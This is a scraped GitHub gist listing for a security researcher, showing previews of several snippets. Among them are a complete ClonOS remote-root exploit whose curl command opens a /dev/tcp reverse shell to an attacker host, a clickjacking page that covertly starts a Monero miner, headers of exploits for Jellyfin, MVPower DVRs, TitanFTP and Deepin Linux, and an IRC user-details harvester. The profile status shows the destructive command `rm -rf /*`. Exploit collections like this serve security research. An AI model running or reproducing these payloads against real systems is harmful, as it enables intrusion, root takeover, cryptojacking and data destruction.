Skip to content

Instantly share code, notes, and snippets.

View bcoles's full-sized avatar
💭
`rm -rf /*`

bcoles

💭
`rm -rf /*`
776 followers · 38 following
View GitHub Profile
@bcoles
bcoles / http-igd-info.nse
Created January 29, 2012 04:38
http-igd-info.nse - Attempts to retrieve device information from an Internet Gateway Device (IGD) UPnP configuration file.
description = [[
Attempts to retrieve device information from an Internet Gateway Device (IGD)
UPnP configuration file.
For more information, see:
http://upnp.org/specs/gw/igd2
http://en.wikipedia.org/wiki/Internet_Gateway_Device_Protocol
]]
---
@bcoles
bcoles / gpsd-ng-info.nse
Created January 24, 2012 12:41
gpsd-ng-info.nse - Retrieves device and version information from a listening GPSD-NG daemon.
description = [[
Retrieves device and version information from a listening GPSD-NG daemon.
gpsd is a service daemon that monitors one or more GPSes or AIS receivers attached to a host computer through serial or USB ports, making all data on the location/course/velocity of the sensors available to be queried on TCP port 2947 of the host computer.
For more information about GPSD-NG, see:
http://gpsd.berlios.de/gpsd.html
http://en.wikipedia.org/wiki/Gpsd
http://gpsd.berlios.de/protocol-evolution.html
]]
@bcoles
bcoles / miller-fuzz.rb
Created July 9, 2017 21:19
A Ruby port of Charlie Miller's infamous 5 line Python dumb fuzzer
#!/usr/bin/env ruby
#
# A Ruby port of Charlie Miller's infamous 5 line Python dumb fuzzer
# ~ bcoles
=begin
# Original Python code:
numwrites = random.randrange(math.ceil((float(len(buf)) / FuzzFactor))) + 1
for j in range(numwrites):
rbyte = random.randrange(256)
@bcoles
bcoles / jellyfin-brute.rb
Created August 21, 2019 16:02
Jellyfin Password Reset PIN Brute Force
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force #
# #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
# This will likely also work on Emby Media Server, but untested. #
# #
# Note: cURL must be installed and in $PATH #
# #
# Note: Upon successful expoitation, the password will be reset for all users, #
@bcoles
bcoles / mvpower_dvr_shell_exec_telnet.rb
Created February 25, 2017 11:52
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string. This module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shel…
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
@bcoles
bcoles / clickjack-authedmine.html
Created October 21, 2017 19:32
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");
@bcoles
bcoles / titanftp-server-admin-event-handler-rce
Last active March 22, 2020 04:19
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
@bcoles
bcoles / clonos-root-rce.sh
Last active November 4, 2019 13:30
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
@bcoles
bcoles / bitmon.py
Created May 20, 2011 10:36
monitors irc.lfnet.org:6667#bitcoin and extracts user details
################################################################################
# bitmon
# Description: monitors irc.lfnet.org:6667#bitcoin and extracts user details
# Author: Brendan Coles <bcoles@gmail.com>
# Version: 0.1-20110520
################################################################################
import socket, string
botname = 'u1rt6zQzvGpS1Zz' # change this
channel = '#bitcoin'
@bcoles
bcoles / lastore-daemon-root.sh
Created March 24, 2018 22:39
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/